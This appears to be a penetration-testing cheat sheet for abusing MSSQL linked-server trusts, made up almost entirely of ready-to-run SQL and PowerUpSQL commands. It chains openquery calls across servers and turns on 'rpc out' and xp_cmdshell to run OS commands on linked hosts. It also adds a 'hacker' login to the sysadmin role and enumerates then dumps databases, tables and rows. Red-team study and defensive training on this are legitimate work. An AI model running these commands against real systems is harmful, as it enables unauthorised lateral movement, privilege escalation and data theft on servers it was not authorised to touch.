MSSQL - Linked Database
- Find Trusted Link
- Execute Query Through The Link
- Crawl Links for Instances in the Domain
- Crawl Links for a Specific Instance
- Query Version of Linked Database
- Execute Procedure on Linked Database
- Determine Names of Linked Databases
- Determine All the Tables Names from a Selected Linked Database
- Gather the Top 5 Columns from a Selected Linked Table
- Gather Entries from a Selected Linked Column
Find Trusted Link
Execute Query Through The Link
-- execute query through the link
select * from openquery("dcorp-sql1", 'select * from master..sysservers')
select version from openquery("linkedserver", 'select @@version as version');
-- chain multiple openquery
select version from openquery("link1",'select version from openquery("link2","select @@version as version")')
-- enable rpc out for xp_cmdshell
EXEC sp_serveroption 'sqllinked-hostname', 'rpc', 'true';
EXEC sp_serveroption 'sqllinked-hostname', 'rpc out', 'true';
select * from openquery("SQL03", 'EXEC sp_serveroption ''SQL03'',''rpc'',''true'';');
select * from openquery("SQL03", 'EXEC sp_serveroption ''SQL03'',''rpc out'',''true'';');
-- execute shell commands
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer
select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"')
-- create user and give admin privileges
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
Crawl Links for Instances in the Domain
A Valid Link Will Be Identified by the DatabaseLinkName Field in the Results
Crawl Links for a Specific Instance
Get-SQLServerLinkCrawl -Instance "<DBSERVERNAME\DBInstance>" -Verbose
select * from openquery("<instance>",'select * from openquery("<instance2>",''select * from master..sysservers'')')
Query Version of Linked Database
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DBSERVERNAME\DBInstance>`",'select @@version')" -Verbose
Execute Procedure on Linked Database
SQL> EXECUTE('EXEC sp_configure ''show advanced options'',1') at "linked.database.local";
SQL> EXECUTE('RECONFIGURE') at "linked.database.local";
SQL> EXECUTE('EXEC sp_configure ''xp_cmdshell'',1;') at "linked.database.local";
SQL> EXECUTE('RECONFIGURE') at "linked.database.local";
SQL> EXECUTE('exec xp_cmdshell whoami') at "linked.database.local";
Determine Names of Linked Databases
tempdb, model ,and msdb are default databases usually not worth looking into. Master is also default but may have something and anything else is custom and definitely worth digging into. The result is DatabaseName which feeds into following query.
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DatabaseLinkName>`",'select name from sys.databases')" -Verbose
Determine All the Tables Names from a Selected Linked Database
The result is TableName which feeds into following query
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DatabaseLinkName>`",'select name from <DatabaseNameFromPreviousCommand>.sys.tables')" -Verbose
Gather the Top 5 Columns from a Selected Linked Table
The results are ColumnName and ColumnValue which feed into following query
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DatabaseLinkName>`",'select TOP 5 * from <DatabaseNameFromPreviousCommand>.dbo.<TableNameFromPreviousCommand>')" -Verbose